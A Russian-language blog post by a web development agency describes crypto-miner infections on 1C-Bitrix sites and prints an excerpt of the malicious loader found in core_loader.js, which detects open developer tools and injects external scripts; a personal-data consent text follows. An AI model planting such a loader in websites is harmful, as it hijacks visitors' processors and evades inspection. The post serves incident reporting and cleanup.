Презентация

Следи за нами

Презентация
СВЯЗАТЬСЯ С НАМИ

Вирусы-майнеры на сайтах

За последние несколько месяцев выросло количество сайтов на платформе 1С-Битрикс "Управление сайтом" зараженных вирусами-майнерами.

Всё началось с того, что к нам обратился наш клиент, которому стали поступать от посетителей жалобы на 100% загруженность процессора при посещении сайта. Причем майнер активизировался только на macbook'ах в хроме. На других проектах, где мы встретили данный вирус он работал во всех браузерах.

Мы начали анализировать ситуацию и очень быстро нашли файлы /bitrix/js/main/core/core_loader.js и /bitrix/js/main/core/core_tasker.js

Примерное содержимое:
;(function(window){
window.jssassin = window.jssassin || {

    config: {
        instpDelay: 400,
        startDelay: 1600
    },
    
    state: {
        scriptsNotLoad: 0,
        init: false
    },
    
    proc: {
            start: function(){},
            destroy: function(){}
        },
    
    inspInterval: undefined,
    
    init: function (
            scripts,
            start,
            destroy
        ) {
        
        if (this.state.init) return;
        this.state.init = true;
        
        var self = this;
        this.checkDevtoolsByConsoleInit(); 
        if (this.isDangerous()) return;
        
        if (typeof start == "function") this.proc.start = start;
        if (typeof destroy == "function") this.proc.destroy = destroy;
        
        
        this.state.scriptsNotLoad = scripts.length;
                                                    
        if (this.state.scriptsNotLoad > 0) {
            scripts.forEach(function(src) {
                var script = document.createElement('script');
                script.src = src;
                script.async = false;
                script.onload = function () {self.onloadScript(script)};
                document.head.appendChild(script);
            });
            
            return;
        }

Данный файл просто удалили. Откуда он появился и как его загрузили на сайт - установить не удалось. Ситуацию взяли на контроль, но скрипт больше не появлялся.

Мы будем искать проблему дальше. Если Вы столкнулись с такой же уязвимостью - Вы уже знаете что делать.
Вернуться назад

Интересные статьи

Вебинар "Как организовать разработку сайта с помощью субподряда"

Как прикрепить файлы из веб-формы в письмо

Что делать, если хочется получать информацию из веб-форм на email, а не заходить каждый раз в административную часть битрикса? Расскажем в этой статье!
Посмотреть все

Я даю своё согласие на обработку персональных данных

Прикрепить файл

до 50мб

Согласие на обработку персональных данных

Продолжая использовать данный сайт, я даю свободно, своей волей и в своем интересе свое конкретное, информированное и сознательное согласие на обработку ООО «Манао Дев» (220073, ул. Бирюзова, д. 4, корп. 5, комн. 4005, г. Минск, Республика Беларусь) (далее – «Компания») моих следующих персональных данных, собираемых через сайт //manao-dev.by (далее – «Сайт»):

сведения, предоставленные мной в формах обратной связи, а также собираемые в автоматическом режиме (IP-адреса устройств, с помощью которых посещается Сайт, тип устройства, дата и время посещения Сайта, обновления и удаления данных, сведения о действиях на Сайте (в т.ч. о просматриваемой рекламе, использовании сервисов Сайта), файлы «cookies»), в т.ч. с использованием метрических программ (систем) Яндекс.Метрика, Google Analytics, Google Tag Manager, Hotjar и других, в соответствии с условиями обработки, изложенными в настоящем согласии.

Действия с персональными данными и способы обработки.

Настоящее согласие дается на совершение любых действий (операций) или совокупности действий (операций), включая сбор, запись, систематизацию, накопление, хранение, уточнение, извлечение, использование, обезличивание, блокирование, удаление, уничтожение персональных данных, совершаемые любыми способами, как с использованием средств автоматизации, так и без их использования, в том числе путем внесения в информационные системы персональных данных Компании.

Цели.

Обработка моих персональных данных на основании настоящего согласия может осуществляться Компанией в целях:

  • предоставления мне запрашиваемой информации об услугах Компании,
  • улучшения работы Сайта, повышения удобства и эффективности моей работы с Сайтом,
  • предоставления решений и услуг, наиболее отвечающих моим потребностям,
  • определения моих предпочтений, отображения рекламных объявлений (поведенческой рекламы),
  • предоставления целевой информации по решениям и услугам Компании и её партнёров,
  • предоставления мне таргетированной рекламы на основе моих предпочтений/действий на Сайте посредством сервисов ВКонтакте, Facebook, Instagram, - обеспечения технической возможности функционирования Сайта.
Третьи лица.

Я понимаю, что Компания использует рекламные услуги социальных сетей ВKонтакте, Facebook, Instagram, в связи с чем я даю свое согласие на передачу и предоставление доступа к моим персональным данным, собираемым через Сайт, а именно следующих:

  • IP-адреса устройств, с помощью которых посещается Сайт, история браузера, тип устройства, тип операционной системы и компьютера, мобильного браузера, дата и время посещения Сайта (сессии), обновления и удаления данных, сведения о действиях на Сайте (в т.ч. о просматриваемой рекламе, использовании сервисов Сайта), файлы «cookies»,
  • владельцам социальных сетей ВКонтакте (www.vk.com, Общество с ограниченной ответственностью «В Контакте» (ООО «В Контакте»), адрес места нахождения: 191024, Санкт-Петербург, ул. Херсонская, д. 12-14, литер А, помещение 1-Н), Facebook (www.facebook.com, Facebook, Inc. 1601 Willow Rd. Menlo Park, CA 94025), Instagram (www.instagram.com, Facebook, Inc. 1601 Willow Rd. Menlo Park, CA 94025), для целей предоставления сервисов измерения и таргетинга рекламы на основе моих предпочтений/действий посредством социальных сетей ВКонтакте, Facebook, Instagram.

Я уведомлен(а), что указанные выше владельцы социальных сетей Facebook, Instagram, ВКонтакте могут использовать файлы cookie, веб-маяки и другие технологии хранения данных для сбора или получения информации с Сайта и любых других ресурсов сети Интернет и использовать эту информацию для указанных выше целей. Я уведомлен(а), что могу запретить сбор и использование информации для таргетинга рекламы путем запрета сохранения файлов «cookies» в настройках своего браузера. Я также уведомлен(а), что могу получить доступ к механизму осуществления такого выбора на сайтах:

  • www.aboutads.info/choices
  • http://www.youronlinechoices.eu/.

Компания уведомила меня о том, что более подробную информацию о cookie-файлах и принципах их работы можно найти на ресурсе http://www.aboutcookies.org/.

Срок действия.

Настоящее согласие действует с момента его предоставления и в течение всего периода использования мной Сайта до момента отзыва настоящего согласия. На протяжении данного срока Компания, иные указанные в настоящем Согласии лица вправе обрабатывать, в том числе хранить, мои персональные данные, указанные в настоящем согласии.

Порядок отзыва согласия.

Мне известно, что настоящее согласие в любой момент может быть мною отозвано посредством направления в Компанию письменного уведомления об отзыве, направленного заказным письмом или переданного лично по адресу: Общество с ограниченной ответственностью «Манао Дев», 220073, ул. Бирюзова, д. 4, корп. 5, комн. 4005, г. Минск, Республика Беларусь. Отзыв настоящего Согласия вступает в силу с даты вручения соответствующего уведомления Компании.

В случае отзыва согласия на обработку персональных данных я проинформирован(а) о необходимости прекратить использование Сайта или, в случае отзыва согласия только в отношении обработки файлов «cookies», отказа от обработки персональных данных метрическими программами (Яндекс.Метрика, Google Analytics, Google Tag Manager, Hotjar и др.), в том числе собираемых и обрабатываемых для предоставления/показа поведенческой и таргетированной рекламы, я проинформирован(а) о необходимости отключить файлы «cookies» в настройках моего браузера.